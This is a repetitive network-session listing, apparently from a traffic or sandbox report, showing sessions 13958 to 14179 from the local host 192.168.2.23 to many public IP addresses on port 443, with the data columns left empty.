                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13958192.168.2.234759644.137.227.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13959192.168.2.233738692.24.123.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13960192.168.2.2355988106.137.111.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13961192.168.2.233910458.120.41.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13962192.168.2.234302469.41.134.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13963192.168.2.2354472207.56.87.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13964192.168.2.2342530138.35.54.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13965192.168.2.234182479.247.33.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13966192.168.2.2359890125.168.101.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13967192.168.2.234026434.213.154.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13968192.168.2.2351402223.210.150.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13969192.168.2.2347966119.29.38.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13970192.168.2.235457682.44.30.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13971192.168.2.2352686210.87.178.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13972192.168.2.235216819.83.208.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13973192.168.2.2359882124.248.110.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13974192.168.2.2348922134.208.156.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13975192.168.2.233615672.147.184.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13976192.168.2.236044213.255.115.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13977192.168.2.2333868140.208.8.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13978192.168.2.2333992139.68.126.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13979192.168.2.2354596134.53.51.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13980192.168.2.23494484.254.251.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13981192.168.2.236026613.178.166.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13982192.168.2.2360384119.78.55.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13983192.168.2.2357754182.18.227.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13984192.168.2.2356006130.26.123.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13985192.168.2.2350408134.165.59.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13986192.168.2.233341268.143.99.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13987192.168.2.2339430177.190.201.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13988192.168.2.233628285.180.51.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13989192.168.2.2356602151.43.227.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13990192.168.2.2343146133.114.225.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13991192.168.2.234514843.207.165.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13992192.168.2.234977672.132.255.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13993192.168.2.2337796150.3.137.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13994192.168.2.2351136194.123.32.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13995192.168.2.2337632164.199.9.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13996192.168.2.2340028145.184.223.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13997192.168.2.236086052.20.168.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13998192.168.2.23512529.27.51.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13999192.168.2.2352956188.125.240.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14000192.168.2.235218613.54.51.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14001192.168.2.2343000217.217.181.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14002192.168.2.2340260158.47.170.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14003192.168.2.233822054.145.132.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14004192.168.2.2357046117.196.181.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14005192.168.2.235816824.26.20.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14006192.168.2.2347500172.15.184.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14007192.168.2.2355936191.162.203.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14008192.168.2.233555231.54.185.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14009192.168.2.2345266219.211.40.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14010192.168.2.235433470.91.25.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14011192.168.2.2333194175.184.69.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14012192.168.2.2339018182.90.37.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14013192.168.2.235547495.202.73.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14014192.168.2.2334640207.213.244.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14015192.168.2.2360500208.98.221.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14016192.168.2.2346550220.191.150.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14017192.168.2.2355632197.57.112.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14018192.168.2.233929251.133.155.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14019192.168.2.2335454126.151.59.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14020192.168.2.2357184194.202.178.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14021192.168.2.2340400196.52.203.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14022192.168.2.236019097.157.125.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14023192.168.2.2354306185.85.154.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14024192.168.2.235528419.0.201.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14025192.168.2.235653679.47.196.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14026192.168.2.2344424126.100.149.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14027192.168.2.235682680.241.83.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14028192.168.2.2344774202.135.61.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14029192.168.2.23332109.226.136.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14030192.168.2.2336938110.49.129.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14031192.168.2.2344938205.232.212.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14032192.168.2.2355152131.77.178.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14033192.168.2.2355702108.202.188.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14034192.168.2.2347702102.184.5.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14035192.168.2.2355510209.214.72.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14036192.168.2.2338170132.32.23.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14037192.168.2.2346514216.18.150.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14038192.168.2.2356202205.80.134.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14039192.168.2.2359704213.128.29.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14040192.168.2.2358224106.32.84.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14041192.168.2.23601789.41.152.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14042192.168.2.2356194126.48.150.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14043192.168.2.2341972108.30.210.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14044192.168.2.2337268120.106.152.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14045192.168.2.2345494137.119.133.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14046192.168.2.2333372133.105.89.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14047192.168.2.233420464.20.95.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14048192.168.2.235096474.246.197.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14049192.168.2.2345900197.240.19.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14050192.168.2.2346716179.232.16.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14051192.168.2.2339288173.111.40.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14052192.168.2.235913446.109.153.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14053192.168.2.233858248.74.12.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14054192.168.2.2343948173.144.255.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14055192.168.2.236042667.138.233.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14056192.168.2.2349798109.155.56.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14057192.168.2.2338968169.102.107.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14058192.168.2.2345250100.193.240.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14059192.168.2.235442438.66.179.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14060192.168.2.2347204115.79.193.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14061192.168.2.2354066202.197.154.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14062192.168.2.2346782140.95.182.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14063192.168.2.2360860176.216.184.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14064192.168.2.2352174148.209.40.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14065192.168.2.2356944131.202.96.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14066192.168.2.2341178143.10.226.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14067192.168.2.234043897.40.57.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14068192.168.2.234429096.177.110.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14069192.168.2.2350816223.91.2.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14070192.168.2.234812453.121.11.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14071192.168.2.234404689.148.191.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14072192.168.2.234607219.102.97.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14073192.168.2.2355712138.121.188.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14074192.168.2.2350946114.87.214.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14075192.168.2.2360950173.22.190.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14076192.168.2.234575840.166.51.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14077192.168.2.23441144.17.85.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14078192.168.2.233966667.122.187.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14079192.168.2.2358740116.3.37.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14080192.168.2.233326873.212.165.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14081192.168.2.2339946191.175.45.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14082192.168.2.234603619.90.112.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14083192.168.2.2338894185.180.57.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14084192.168.2.2337408105.182.249.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14085192.168.2.2340700212.199.161.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14086192.168.2.2360404102.58.215.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14087192.168.2.2340388161.178.58.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14088192.168.2.2335142150.237.229.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14089192.168.2.2335866144.228.69.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14090192.168.2.2352536185.230.100.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14091192.168.2.233807472.183.55.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14092192.168.2.2352570110.246.127.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14093192.168.2.2358038137.152.208.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14094192.168.2.2338548113.81.37.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14095192.168.2.23587425.94.210.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14096192.168.2.23595548.187.181.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14097192.168.2.23455105.244.177.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14098192.168.2.2339446203.165.39.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14099192.168.2.2351318152.92.67.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14100192.168.2.2350824211.224.106.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14101192.168.2.2360550204.179.130.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14102192.168.2.2351458189.33.12.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14103192.168.2.2359774115.84.237.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14104192.168.2.2338150170.126.39.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14105192.168.2.2358194134.125.164.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14106192.168.2.2347884115.25.198.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14107192.168.2.2350018132.145.226.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14108192.168.2.2356266109.61.230.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14109192.168.2.235588862.107.78.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14110192.168.2.233707038.147.125.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14111192.168.2.235039252.230.212.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14112192.168.2.234819247.201.92.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14113192.168.2.234677843.101.133.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14114192.168.2.2360950137.121.5.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14115192.168.2.2342282129.123.101.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14116192.168.2.2360108159.39.49.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14117192.168.2.234260054.98.120.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14118192.168.2.2357484114.224.238.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14119192.168.2.233600699.179.161.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14120192.168.2.235891089.117.39.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14121192.168.2.234418045.181.113.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14122192.168.2.234833652.67.0.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14123192.168.2.235512693.28.23.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14124192.168.2.235402017.246.64.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14125192.168.2.235255451.202.64.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14126192.168.2.2338242100.44.216.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14127192.168.2.233979075.84.225.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14128192.168.2.233408231.187.110.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14129192.168.2.2348938136.173.244.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14130192.168.2.2350140208.15.238.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14131192.168.2.2338358182.205.215.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14132192.168.2.234820043.175.128.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14133192.168.2.2358926206.183.89.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14134192.168.2.2347356147.32.121.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14135192.168.2.23389462.161.2.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14136192.168.2.234074080.166.138.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14137192.168.2.234462612.167.183.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14138192.168.2.234457885.114.13.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14139192.168.2.2336324124.152.102.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14140192.168.2.235150686.201.183.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14141192.168.2.23428382.28.189.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14142192.168.2.234707254.185.226.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14143192.168.2.233468818.36.173.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14144192.168.2.235628073.140.216.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14145192.168.2.23480421.42.106.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14146192.168.2.2354976147.108.168.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14147192.168.2.2351178160.86.87.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14148192.168.2.2333366119.19.59.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14149192.168.2.2334340188.176.221.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14150192.168.2.235098843.174.243.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14151192.168.2.2352832213.178.220.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14152192.168.2.233472658.203.131.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14153192.168.2.233482065.88.172.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14154192.168.2.2333924124.161.233.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14155192.168.2.2336870199.96.173.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14156192.168.2.2343752131.137.220.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14157192.168.2.2351370149.71.64.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14158192.168.2.233669686.114.45.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14159192.168.2.2343110188.215.131.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14160192.168.2.2359628153.244.139.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14161192.168.2.2347606184.211.1.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14162192.168.2.235077813.103.236.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14163192.168.2.2353766190.198.77.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14164192.168.2.2341586161.57.113.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14165192.168.2.2358184163.168.42.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14166192.168.2.235336627.180.206.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14167192.168.2.2347146184.196.226.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14168192.168.2.2333712124.87.243.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14169192.168.2.2349480126.66.254.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14170192.168.2.2340288137.251.134.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14171192.168.2.233539037.194.42.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14172192.168.2.233440450.88.110.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14173192.168.2.233573620.232.26.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14174192.168.2.234713446.3.202.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14175192.168.2.2345644140.1.255.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14176192.168.2.2359944204.96.139.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14177192.168.2.2357422159.126.74.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14178192.168.2.23495789.81.241.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14179192.168.2.2347356107.63.114.162443
